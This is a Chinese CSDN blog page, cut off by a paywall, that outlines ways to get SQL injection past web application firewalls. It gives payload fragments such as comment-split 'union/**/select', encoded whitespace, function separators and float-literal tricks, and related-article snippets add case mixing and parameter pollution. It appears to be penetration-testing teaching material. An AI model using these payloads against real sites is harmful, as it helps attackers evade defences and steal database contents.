SQL注入-绕过WAF以及一些注入手段

最新推荐文章于 2024-04-27 21:56:16 发布
最新推荐文章于 2024-04-27 21:56:16 发布
阅读量5.2k 收藏 15
点赞数 2
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25899635/article/details/90476644
版权

WAF绕过原理

白盒绕过
  熟练的掌握MySQL函数和语法使用方式
  深入了解中间件运行处理机制
  了解WAF防护原理及方法

黑盒测试:(http://www.mottoin.com/86886.html)
一.架构层绕过WAF:
  1. 寻找源站->针对云WAF
  2. 利用同网段->绕过WAF防护区域
  3. 利用边界漏洞->绕过WAF防护区域
二.资源限制角度绕过WAF:
  1. POST大BOOY
三.协议层面绕过WAF的检测:
  1. 协议未覆盖绕过WAf
  *请求方式变换:GET->POST
  *Content-Type变换:application/x-www-form-urlencoded:-> multipart/from-data
  2. 参数污染
四.规则层面的绕过:
主要的绕过方式

  1. SQL注释符绕过
    Level-1: union/**/select
    Level-2: union/aaaa%01bbs/select
    Level-3: union/aaaaaaaaaaaaaaaaaaaaaaaaaaaa/select
  2. 内连注释:/!xxxx/
  3. 空白符号绕过:
    MySQL空白符:%90,%0A,%0B,%0D,%20,%0C,%A0,/xxx/
    正则的空白符:%09,%0A,%0B,%0D,%20
    Example-1:union%250Cselect
    Example-1:union%25A0select
  4. 函数分隔符号:
    concat%2520(
    concat/**/(
    concat%250c(
    concat%25a0(
  5. 浮点数词法分析:
    select * from users where id=8E0union select
    1,2,3,4,5,6,7,8,9,0
    select * from users where id=8.0union select
    1,2,3,4,5,6,7,8,9,0
    select * from use
最低0.47元/天 解锁文章
Mandorr
关注
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAF(Web Application Firewall)的常见特征是指其具有审计...
SQL注入WAF绕过
热门推荐
xdjxi的博客
03-14 1万+
SQL注入WAF绕过的基本方法 WAF绕过 WAF(Web Application Firewall)的中文名称叫做“Web应用防火墙”,它依罪女全策略对Web应用程序进行保护。安全策略是WAF的灵魂,所谓的“绕过WAF”就是指通过某种方式无视WAF的安全策略,达到攻击的目的。 方法1:变换大小写 实例:比如WAF拦截了union,那就使用Union、UnloN等方式绕过。 方法2:编码 实例1:WAF检测敏感字'~,则可以用Ox7e代替,如extractvalue(1 ,concat('~.
黑客常用SQL注入绕过技术总结!(冰河吐血整理,建议收藏)
最新发布
2401_84264536的博客
04-27 2079
最后的or '1闭合查询语句的最后的单引号,或者:id=1’ union select 1,2,'3使用like 、rlike 、regexp 或者 使用< 或者 >(1)使用注释符绕过常用注释符://,-- , /**/, #, --+, – -, ;,%00,–a用法:U// NION // SE// LECT //user,pwd from user(2)使用大小写绕过id=-1’UnIoN/**/SeLeCT(3)内联注释绕过id=-1’/!UnIoN/ SeLeCT 1,2,concat(/!ta
SQL注入WAF绕过技巧
永远是少年
08-11 2720
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入WAF绕过技巧。 一、数据层面绕过WAF 二、方式层面绕过WAF 三、其他方式绕过WAF 四、写在最后
SQL注入绕过技巧
2301_77160226的博客
06-10 3122
SQL注入绕过技巧
聊一聊SQL注入常用绕WAF小技巧
Javachichi的博客
02-08 1520
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
SQL注入实战:绕过操作
ting_liang的博客
01-27 1583
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
SQL注入中的WAF绕过技术
08-19
SQL注入中的WAF绕过技术,里面的思路很好,可以学习一下
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
SQL注入WAF绕过注入
weixin_54105551的博客
07-03 2454
本文主要讲的是如何绕过WAF的基础知识,写的不好,请多多见谅。
生命在于学习——SQL注入绕过
易水哲的博客
08-17 9421
SQL注入绕过技术已经是一个老生常淡的内容了
SQL注入绕过WAF方法使用
m0_55854679的博客
02-19 2141
文章推荐【SQL注入绕过WAF】 文章目录WAF介绍WAF检测机制常见的绕过方法【1、4、5、7较常用】 WAF介绍 看图识WAF Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF) 核心目的:防御网站被入侵。 具体手段:检测到你的入侵者,然后拦截你当前访问的页面或者是跳转其他页面,或者是直接禁止你的ip访问。 日常生活中,有些网站不一定安装了WAF,但是他可能会有自己的防护策略,过滤你的恶意传参数据,例如传参不能出现un
sql注入篇--绕过WAF
qq_51003021的博客
08-12 2035
针对WAF绕过
[转载]深入理解SQL注入绕过WAF和过滤机制
weixin_33991727的博客
06-27 1096
知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 本文小结 0x6 参考资料 0x0 前言 促使本文产生最初的动机是前些天在做测试时一些攻击向量被WAF挡掉了,而且遇到异常输入直接发生重定向。之前对WAF并不太了解,因此趁此...
sql 注入 绕过 waf
3569
07-01 4243
https://notwhy.github.io/2018/06/sql-injection-fuck-waf/0x0 前言 0x1 注入点检测 0x2 bypass waf 0x3 自动化0x0 前言  这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波...
见招拆招:绕过WAF继续SQL注入常用方法
weixin_30764137的博客
06-20 687
  这篇文章之前的名字叫做:WAF bypass for SQL injection #理论篇,我于6月17日投稿了Freebuf。链接:点击这里现博客恢复,特发此处。   Web Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断绕过WAF bypass是一个永恒的话题,不少基友也总结了很多奇技怪招。那今天我在这里做个小小的扫盲吧。先来说说WAF bypass是...
sql注入之——常用绕过waf方式
wsnbbz的博客
02-11 1855
1.参数污染 原理: 正则表达式一般只检测第一个参数,我们可以第一个参数放正常数据流量,第二个参数放攻击数据流量 语句 http://localhost/sqli-labs-master/Less-31/login.php/?id=1111&id=-1") union select 1,2,3-- - 可以看到第二个参数执行sql语句成功,但第一个参数不可以,我们之后在1,2,3处替换sq...
SQL注入绕过WAF
02-14
SQL注入绕过WAF的方法有很多种,其中一些常见的方法包括: 1. 使用URL编码来隐藏特殊字符,例如将“'”编码为“%27”。 2. 使用多语句查询来绕过WAF,例如将“;”替换为“%3b”。 3. 使用不常见的SQL关键字来绕过WAF,例如使用“version()”代替“@@version”。 4. 使用无用代码来混淆真正的SQL语句,例如在SQL语句中添加多余的空格和注释。 5. 使用已知的WAF绕过技巧来绕过WAF,例如使用“/*!union*/”代替“union”。 但是,这些方法并不能保证百分之百能绕过WAF,因为WAF的防御能力在不断提升,并且WAF厂商会不断更新WAF规则来防御这些攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值